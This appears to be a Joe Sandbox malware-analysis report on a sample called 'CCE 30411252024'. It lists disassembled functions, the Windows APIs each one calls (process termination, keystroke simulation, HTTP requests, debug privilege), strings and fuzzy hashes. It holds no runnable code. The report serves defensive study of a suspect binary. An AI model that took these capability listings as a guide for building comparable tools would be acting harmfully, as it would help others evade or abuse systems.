                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 1241431887-3916222277
                                                                                        • Opcode ID: bf34da39360408890584d567b48b5573817ca4b21a556479fa63b8776b969140
                                                                                        • Instruction ID: 2d62bf2c757283d7ca13f3fb129d8b9052416e4e4fa88ce2ddfeff4490dc50df
                                                                                        • Opcode Fuzzy Hash: bf34da39360408890584d567b48b5573817ca4b21a556479fa63b8776b969140
                                                                                        • Instruction Fuzzy Hash: F64192B1A01609BFEB059F50CC86FFB77ACFF09724F004016FA159A181D7B4AD44ABA5
                                                                                        Function 00F3B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F7DC00), ref: 00F3B715
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F7DC00), ref: 00F3B749
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F3B8C1
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F3B8EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: 70386b2a66d0408792ae9641cf18aa0216becf170eac8424b1cd58be426b7b3e
                                                                                        • Instruction ID: b84d2b9230116c666c4a68e69e779aea2b0adf3f580c30add6a2fc339979ef7e
                                                                                        • Opcode Fuzzy Hash: 70386b2a66d0408792ae9641cf18aa0216becf170eac8424b1cd58be426b7b3e
                                                                                        • Instruction Fuzzy Hash: 86F11971A00109EFCF04DF94C898EAEB7B9FF49325F108499FA15AB250DB75AE42DB50
                                                                                        Function 00F424D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F424F5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F42688
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F426AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F426EC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4270E
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F4286F
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F428A1
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F428D0
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F42947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: 9bdb8f19ae9f7d6fe2d0cbab1b93fa000e9eb3aeb20a8fcca80fb75f10f237d2
                                                                                        • Instruction ID: c8a8ab2da0c8a4c91d2aa50ce0f0a8b6052839677f4031d352b365633d3a0d00
                                                                                        • Opcode Fuzzy Hash: 9bdb8f19ae9f7d6fe2d0cbab1b93fa000e9eb3aeb20a8fcca80fb75f10f237d2
                                                                                        • Instruction Fuzzy Hash: A1D1B031604244DFC714EF25C891B6EBBE5BF84324F18846DF999AB2A2DB31DC41DB52
                                                                                        Function 00F4B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F4B3F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: b61d3b9dfa1e916c59b06f664dc2199017028cac3f786a4dc3f6a732a30bc8f6
                                                                                        • Instruction ID: 2344f9ff33e422cccce40b5fbf2df0043b55f39ad45bf3b87764185323bfba00
                                                                                        • Opcode Fuzzy Hash: b61d3b9dfa1e916c59b06f664dc2199017028cac3f786a4dc3f6a732a30bc8f6
                                                                                        • Instruction Fuzzy Hash: F151B331A04208BFEF249F29CC85BAD7FA4AB05764F284011FE25E62E3D775E940BB51
                                                                                        Function 00EFA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F5DB1B
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F5DB3C
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F5DB51
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F5DB6E
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F5DB95
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EFA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F5DBA0
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F5DBBD
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EFA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F5DBC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 1268354404-0
                                                                                        • Opcode ID: c421331b77f85ded3f0d756b0a74653d505a66888c8b416faf174a3b5081427a
                                                                                        • Instruction ID: 6a6b13a7890311b460b734d77bd641fdc920e45e0a8c542b7b767da172452ab6
                                                                                        • Opcode Fuzzy Hash: c421331b77f85ded3f0d756b0a74653d505a66888c8b416faf174a3b5081427a
                                                                                        • Instruction Fuzzy Hash: 2A517070A00209EFDB24DF64CC81FAA77F5BB48354F150529FA1AEA2D0D7B0AC50EB50
                                                                                        Function 00F27555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F25FA6,?), ref: 00F26ED8
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F25FA6,?), ref: 00F26EF1
                                                                                          • Part of subcall function 00F272CB: GetFileAttributesW.KERNEL32(?,00F26019), ref: 00F272CC
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F275CA
                                                                                        • _wcscmp.LIBCMT ref: 00F275E2
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F275FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 6379dd020d4912afe0b79b0a2ba1b9c3d4907e8166aac4303300ed4252ab682b
                                                                                        • Instruction ID: 8493f866c29548d1369d09b105fec16845daffa37ea33176849c430d72000fed
                                                                                        • Opcode Fuzzy Hash: 6379dd020d4912afe0b79b0a2ba1b9c3d4907e8166aac4303300ed4252ab682b
                                                                                        • Instruction Fuzzy Hash: 725100B2E092299ADF54EB94EC519DE73BCAF08320F1040AAF605E3541EB7496C5DF64
                                                                                        Function 00EFEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00EFEAEB
                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00EFEB32
                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00F5DC86
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00F5DCF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 521af8b6cc58f2dc99bc08d07be6ff59be51284d6a7abebd5113a70a7ffe5d00
                                                                                        • Instruction ID: 7f3233c69e1165dc34ca5b494afa40a3e69bb2972a2ae3d23705dd9562b16ec3
                                                                                        • Opcode Fuzzy Hash: 521af8b6cc58f2dc99bc08d07be6ff59be51284d6a7abebd5113a70a7ffe5d00
                                                                                        • Instruction Fuzzy Hash: 72414A70709688DAC7354B28CD8DB7A7A96FB81319F19240DF357A6771C6B1B844E311
                                                                                        Function 00F1BFF0 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F1D342: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1D362
                                                                                          • Part of subcall function 00F1D342: GetCurrentThreadId.KERNEL32 ref: 00F1D369
                                                                                          • Part of subcall function 00F1D342: AttachThreadInput.USER32(00000000,?,00F1C005,?,00000001), ref: 00F1D370
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1C010
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F1C02D
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F1C030
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1C039
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F1C057
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F1C05A
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1C063
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F1C07A
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F1C07D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 9ae2a8ea46bfdf41bcfe09f7c052826f5de77dc8e65bee97de25a3132e74ec17
                                                                                        • Instruction ID: dbe6651bd95db72e8b66ac7ade76bbc9ea07e85bb0b6fad6b9899b68f6532f68
                                                                                        • Opcode Fuzzy Hash: 9ae2a8ea46bfdf41bcfe09f7c052826f5de77dc8e65bee97de25a3132e74ec17
                                                                                        • Instruction Fuzzy Hash: FD11C4B1A4061CBEF7106B75CC89FAA3B2DEB5C755F100415F350AB0E1CAF75C81AAA4
                                                                                        Function 00F1B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B26C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B273
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F1AEF1,00000B00,?,?), ref: 00F1B288
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B290
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B293
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F1AEF1,00000B00,?,?), ref: 00F1B2A3
                                                                                        • GetCurrentProcess.KERNEL32(00F1AEF1,00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B2AB
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B2AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00F1B2D4,00000000,00000000,00000000), ref: 00F1B2C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: f2882d790333d813dc3a2536912f28eda5b7ac3201862903b3e710f6cd405852
                                                                                        • Instruction ID: 12d4e91271f50214b59ac89664f2c606c756aa605fcf4d43811cd141346f3d9f
                                                                                        • Opcode Fuzzy Hash: f2882d790333d813dc3a2536912f28eda5b7ac3201862903b3e710f6cd405852
                                                                                        • Instruction Fuzzy Hash: 8A01BBB5740348BFE710AFA5DC4AF6B7BACEB89711F018411FA15DB2A1CAB49800DB61
                                                                                        Function 00F3C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: c4bfa12e06be0bd31706c0a99e75169b8bb64929a759975cd284b94e92e94b28
                                                                                        • Instruction ID: 92bdbbf0e7eb8bb37187086a2a20873bf4471da9506088a0df1a7d6dbe42a0ab
                                                                                        • Opcode Fuzzy Hash: c4bfa12e06be0bd31706c0a99e75169b8bb64929a759975cd284b94e92e94b28
                                                                                        • Instruction Fuzzy Hash: 34E19072E00219ABDF14DFA8DC91BAE77B5EF48364F148029E905BB281D770AD41EBD0
                                                                                        Function 00F3BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-625585964
                                                                                        • Opcode ID: dee684326c29fb9185d5dc12828ec5a91328cad77be73df9a589493065000113
                                                                                        • Instruction ID: 29658e6c178457c4761c7cd367c22bdccbb8a0ae4384a7f08389dbc7c51d0cff
                                                                                        • Opcode Fuzzy Hash: dee684326c29fb9185d5dc12828ec5a91328cad77be73df9a589493065000113
                                                                                        • Instruction Fuzzy Hash: 3791A171E00219ABDF24CFA5CC54FAEB7B8EF85720F108159FA15AB281DB709944DFA0
                                                                                        Function 00F49A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F49B19
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F49B2D
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F49B47
                                                                                        • _wcscat.LIBCMT ref: 00F49BA2
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F49BB9
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F49BE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: cdf52b07bf8fd676727940f419a3e3fb256835b1076cad2152a706705974cf9d
                                                                                        • Instruction ID: 1447636a100ab475a68fbe0aea52b6a62699be14070c2198dc64c396774e5846
                                                                                        • Opcode Fuzzy Hash: cdf52b07bf8fd676727940f419a3e3fb256835b1076cad2152a706705974cf9d
                                                                                        • Instruction Fuzzy Hash: FA418271A44308ABEB219F64CC85BEB7BA8EF48350F10442AF945E7291D7B59D84EB60
                                                                                        Function 00F4172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F26532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F26554
                                                                                          • Part of subcall function 00F26532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F26564
                                                                                          • Part of subcall function 00F26532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F265F9
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4179A
                                                                                        • GetLastError.KERNEL32 ref: 00F417AD
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F417D9
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F41855
                                                                                        • GetLastError.KERNEL32(00000000), ref: 00F41860
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F41895
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: 6f8ff140a0299f3a3c40d92b0fd275eb5fdccc1b45a89ccfdf5fe213bf468a79
                                                                                        • Instruction ID: 6b7b3e94da8211179cc481a8fd9b2f25b5d30d081a029109eb00a1c4f371dc4c
                                                                                        • Opcode Fuzzy Hash: 6f8ff140a0299f3a3c40d92b0fd275eb5fdccc1b45a89ccfdf5fe213bf468a79
                                                                                        • Instruction Fuzzy Hash: B6419D71B00204AFDB15EF54CD96F6DBBA5AF54310F058058FA06AB2D2DBB8A9409B91
                                                                                        Function 00F25819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00F258B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 73519379d19611773c467253f7a21bb8275963737b953111451593f52d8fcc86
                                                                                        • Instruction ID: 675cb3b1dc8e2ab9778f18a2e56274cda7f1dcb4b37dd3f607f6f901034285a9
                                                                                        • Opcode Fuzzy Hash: 73519379d19611773c467253f7a21bb8275963737b953111451593f52d8fcc86
